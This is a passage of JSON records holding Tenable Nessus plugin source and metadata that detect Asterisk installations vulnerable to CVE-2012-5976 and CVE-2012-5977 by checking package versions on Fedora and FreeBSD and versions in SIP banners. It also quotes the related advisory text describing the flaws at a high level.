\"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.5.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:43:04", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A stack-based buffer overflow error exists related to SIP, HTTP and XMPP handling over TCP. Note that in the case of 'Certified Asterisk', SIP is not affected.\n Further note that in the case of XMPP, an attacker must establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and anonymous calls that could allow system resources to be exhausted. Note this vulnerability only affects systems configured to allow anonymous calls. (CVE-2012-5977)", "cvss3": {}, "published": "2013-02-20T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2012_015.NASL", "href": "https://www.tenable.com/plugins/nessus/64717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64717);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_bugtraq_id(57105, 57106);\n\n script_name(english:\"Asterisk Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by the following\nvulnerabilities :\n\n - A stack-based buffer overflow error exists related to\n SIP, HTTP and XMPP handling over TCP. Note that in the\n case of 'Certified Asterisk', SIP is not affected.\n Further note that in the case of XMPP, an attacker must\n establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and\n anonymous calls that could allow system resources to be\n exhausted. Note this vulnerability only affects systems\n configured to allow anonymous calls. (CVE-2012-5977)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2012-014.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2012-015.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.exodusintel.com/2013/01/07/who-was-phone/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.19.1 / 10.11.1 / 11.1.2, Certified Asterisk\n1.8.11-cert10 or apply the patches listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5976\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from kb name: \"+kb_name);\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port);\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.11.1\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.11.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.1.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.1.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.19.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.19.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.11-certx < 1.8.11-cert10\n if (version =~ \"^1\\.8\\.11([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.11-cert10\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:54", "description": "The Asterisk Development Team has announced the release of Asterisk 11.2.0. This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 11.2.0 resolves several issues reported by the community and would have not been possible without your participation.\nThank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Add missing support for 'who hung up' to chan_motif.\n (Closes issue ASTERISK-20671. Reported by Matt Jordan)\n\n - --- Remove a fixed size limitation for producing SDP and change how ICE support is disabled by default. (Closes issue ASTERISK-20643. Reported by coopvr)\n\n - --- Fix chan_sip websocket payload handling (Closes issue ASTERISK-20745. Reported by Inaki Baz Castillo)\n\n - --- Fix pjproject compilation in certain circumstances (Closes issue ASTERISK-20681. Reported by Dinesh Ramjuttun)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0 The Asterisk Development Team has announced a security release for Asterisk 11, Asterisk 11.1.2. This release addresses the security vulnerabilities reported in AST-2012-014 and AST-2012-015, and replaces the previous version of Asterisk 11 released for these security vulnerabilities. The prior release left open a vulnerability in res_xmpp that exists only in Asterisk 11; as such, other versions of Asterisk were resolved correctly by the previous releases.\n\nThis release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following two issues :\n\n - Stack overflows that occur in some portions of Asterisk that manage a TCP connection. In SIP, this is exploitable via a remote unauthenticated session; in XMPP and HTTP connections, this is exploitable via remote authenticated sessions. The vulnerabilities in SIP and HTTP were corrected in a prior release of Asterisk; the vulnerability in XMPP is resolved in this release.\n\n - A denial of service vulnerability through exploitation of the device state cache. Anonymous calls had the capability to create devices in Asterisk that would never be disposed of. Handling the cachability of device states aggregated via XMPP is handled in this release.\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2012-014 and AST-2012-015.\n\nFor a full list of changes in the current release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-11.1.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2012-014.\n pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2012-01 5.pdf\n\nThank you for your continued support of Asterisk - and we apologize for having to do this twice!\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.2.0-1.fc18 (2013-1003)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-1003.NASL", "href": "https://www.tenable.com/plugins/nessus/64372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1003.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-1003\");\n\n script_name(english:\"Fedora 18 : asterisk-11.2.0-1.fc18 (2013-1003)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n11.2.0. This release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 11.2.0 resolves several issues reported by the\ncommunity and would have not been possible without your participation.\nThank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Add missing support for 'who hung up' to chan_motif.\n (Closes issue ASTERISK-20671. Reported by Matt Jordan)\n\n - --- Remove a fixed size limitation for producing SDP and\n change how ICE support is disabled by default. (Closes\n issue ASTERISK-20643. Reported by coopvr)\n\n - --- Fix chan_sip websocket payload handling (Closes\n issue ASTERISK-20745. Reported by Inaki Baz Castillo)\n\n - --- Fix pjproject compilation in certain circumstances\n (Closes issue ASTERISK-20681. Reported by Dinesh\n Ramjuttun)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0\nThe Asterisk Development Team has announced a security release for\nAsterisk 11, Asterisk 11.1.2. This release addresses the security\nvulnerabilities reported in AST-2012-014 and AST-2012-015, and\nreplaces the previous version of Asterisk 11 released for these\nsecurity vulnerabilities. The prior release left open a vulnerability\nin res_xmpp that exists only in Asterisk 11; as such, other versions\nof Asterisk were resolved correctly by the previous releases.\n\nThis release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following two issues :\n\n - Stack overflows that occur in some portions of Asterisk\n that manage a TCP connection. In SIP, this is\n exploitable via a remote unauthenticated session; in\n XMPP and HTTP connections, this is exploitable via\n remote authenticated sessions. The vulnerabilities in\n SIP and HTTP were corrected in a prior release of\n Asterisk; the vulnerability in XMPP is resolved in this\n release.\n\n - A denial of service vulnerability through exploitation\n of the device state cache. Anonymous calls had the\n capability to create devices in Asterisk that would\n never be disposed of. Handling the cachability of device\n states aggregated via XMPP is handled in this release.\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2012-014 and AST-2012-015.\n\nFor a full list of changes in the current release, please see the\nChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.1.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2012-014.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2012-01\n 5.pdf\n\nThank you for your continued support of Asterisk - and we apologize\nfor having to do this twice!\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2012-014.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2012-015.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.1.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d7ebc469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab374429\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.2.0-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:28", "description": "Asterisk project reports :\n\nCrashes due to large stack allocations when using TCP\n\nDenial of Service Through Exploitation of Device State Caching", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (f7c87a8a-55d5-11e2-a255-c8600054b392)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F7C87A8A55D511E2A255C8600054B392.NASL", "href": "https://www.tenable.com/plugins/nessus/63379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63379);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (f7c87a8a-55d5-11e2-a255-c8600054b392)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Asterisk project reports :\n\nCrashes due to large stack allocations when using TCP\n\nDenial of Service Through Exploitation of Device State Caching\"\n );\n # http://downloads.digium.com/pub/security/AST-2012-014.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.digium.com/pub/security/AST-2012-014.html\"\n );\n # http://downloads.digium.com/pub/security/AST-2012-015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.digium.com/pub/security/AST-2012-015.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/f7c87a8a-55d5-11e2-a255-c8600054b392.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec84b9e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.1.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.11.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.19.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:40:19", "description": "The Asterisk Development Team has announced the release of Asterisk 1.8.20.0. This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 1.8.20.0 resolves several issues reported by the community and would have not been possible without your participation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected Flag (Closes issue ASTERISK-20724. Reported by Michael L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes issue ASTERISK-19205. Reported by Philippe Lindheimer, Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.\n0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 16 : asterisk-1.8.20.0-1.fc16 (2013-0992)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0992.NASL", "href": "https://www.tenable.com/plugins/nessus/64369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0992.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64369);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-0992\");\n\n script_name(english:\"Fedora 16 : asterisk-1.8.20.0-1.fc16 (2013-0992)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n1.8.20.0. This release is 